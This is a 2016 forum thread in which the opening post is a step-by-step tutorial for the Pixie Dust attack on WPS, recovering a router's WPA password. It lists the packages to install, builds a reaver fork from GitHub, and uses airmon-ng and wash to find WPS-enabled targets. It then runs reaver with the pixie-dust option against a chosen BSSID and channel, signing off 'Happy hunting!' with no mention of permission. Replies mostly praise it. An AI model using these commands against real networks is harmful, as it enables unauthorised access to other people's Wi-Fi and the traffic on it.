chevron_left chevron_right
Login Register invert_colors photo_library
Thread Rating:
  • 1 Vote(s) - 5 Average


filter_list Tutorial Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack
Author
Message
Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #1
Explanation of Attack
Due to that cracking WPA passwords via brute-force is virtually impossible and not applicable in real-life situations, it should be avoided at all cost. And retrieving it via social engineering (evil twin, etc.) is very advanced and again, very rarely applicable. So, exploiting WPS is always the way to go - if the router has it enabled - which nearly every modern home (and probably some business) router(s) has. Now, there are numerous ways to exploit  WPS - and this is simply one of them.

First off all, you'll need to understand what WPS is; WPS stands for Wi-Fi Protected Setup and it is a wireless networking standard that tries to make connections between a router and wireless devices faster and easier. It works only for wireless networks that have WPA Personal or WPA2 Personal security. Click on the link to learn more.

So, we'll be utilizing  a (somewhat) new attack coined the "Pixie Dust" attack - which essentially "reverse engineers" the 8-digit pin in certain routers. What I mean is, this attack is specifically designed only for certain chipsets; meaning, you might not have success on all routers. You should simply just try and if you fail, move on to another attack; such as, using reaver to brute-force the damn pin.

The Lab
In my case, I'll be using Kali Linux on a virtual machine. You'll also need a network adapter capable of the usual (mmode, etc.); I'd suggest one of the Alfa models. It has a strong signal as well. If you're using a virtual machine, just connect your adapter device to the machine.

Installing Dependencies; Required Packages to get the Attack Working
Simply install the packages below in order; make sure to update your package lists before doing so.
Code:
build-essential
libpcap-dev
sqlite3
libsqlite3-dev
pixiewps

Downloading & Installing reaver-wps-fork-t6x
This is essentially a program that utilizes what Reaver provides, but slightly modified in-order to adapt into the attack.
Code:
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd ~/
cd src/
./configure
make
make install

Finding & Extracting Information from Target
Enabling monitor mode on your wireless interface is required for extracting the information of said-target.
Code:
airmon-ng start [interface]
wash -i [enabled minterface]
Here you'll see a list of access points, on the right-hand side, you'll see if WPS is enabled or not; if it's 'No' under locked, the attack might be plausible, if it's 'Yes' - your shit 'outta luck. Write down/copy the BSSID and channel number - we'll need it for the attack.

Exploitation
We've gathered the information, we've found out the target might be vulnerable - so shit, let's fire the lazer. Simply substitute your variables instead of mine and let the attack run. If it's vulnerable, you'll have the password within thirty-minutes guaranteed - if it's not vulnerable, you'll be returned error codes/messages.
Code:
reaver -i [enabled minterface] -b [BSSID variable] -c [channel variable] -vvv -K 1 -f

[Image: 4or7nDg.png]

Happy hunting!
(This post was last modified: 10-20-2016, 11:41 PM by 817_091_278.)
If you need to get in contact with me, you may do so over ricochet. My identification is: ricochet:j27xararvgnbbnno.

[+] 3 users Like 817_091_278's post
Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #2
You can technically use whatever Linux-based operating system for this attack, although, you'd have to install all the packages manually from the web; therefor, just using something like Kali Linux makes everything much simpler and quicker to accomplish.
If you need to get in contact with me, you may do so over ricochet. My identification is: ricochet:j27xararvgnbbnno.

Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #3
What a good tutorial. Thanks for posting this.

Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #4
(11-07-2016, 02:18 AM)pvnk Wrote: What a good tutorial. Thanks for posting this.

Much appreciated!
If you need to get in contact with me, you may do so over ricochet. My identification is: ricochet:j27xararvgnbbnno.

Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #5
This is definitely a good start for the n00bs. This method requires very little interaction. Great post!
[Image: giphy.gif]



Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #6
Thanks for this post. It was super helpful and a great read!

Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #7
Good tutorial. Clean and well formatted. I like to play around with wifi and this could be fun to try.
[Image: pSXpir.png]

Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #8
air[enter specific tool here]-ng/reaver tutorials which have been repeated all over the internet 29384926794 x 10²³ times will never stop, will they?

Nice tutorial, I guess.
(This post was last modified: 11-26-2016, 03:44 AM by meow.)
If you're not hated, you're doing something wrong.

Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #9
Excellent tutorial from start to finish, that's well defined and elaborated.

I've cracked quite a few WPS PINs via Reaver Itself, and although It did serve It's purpose, It did fail at the best of times with the good old "WPS Transaction failed......Receive timeout occurred...".

I shall give this tutorial a shot.
Much appreciated.

Reply

RE: Exploting WPS to Retrieve the WPA Password; Pixie Dust Attack #10
Note: Reaver does still technically involve brute-force, but it brute forces the WPS PIN which is way easier than bruting a WPA key.

I am Ender.
[Image: kphlxb.jpg]

Reply






Users browsing this thread: 1 Guest(s)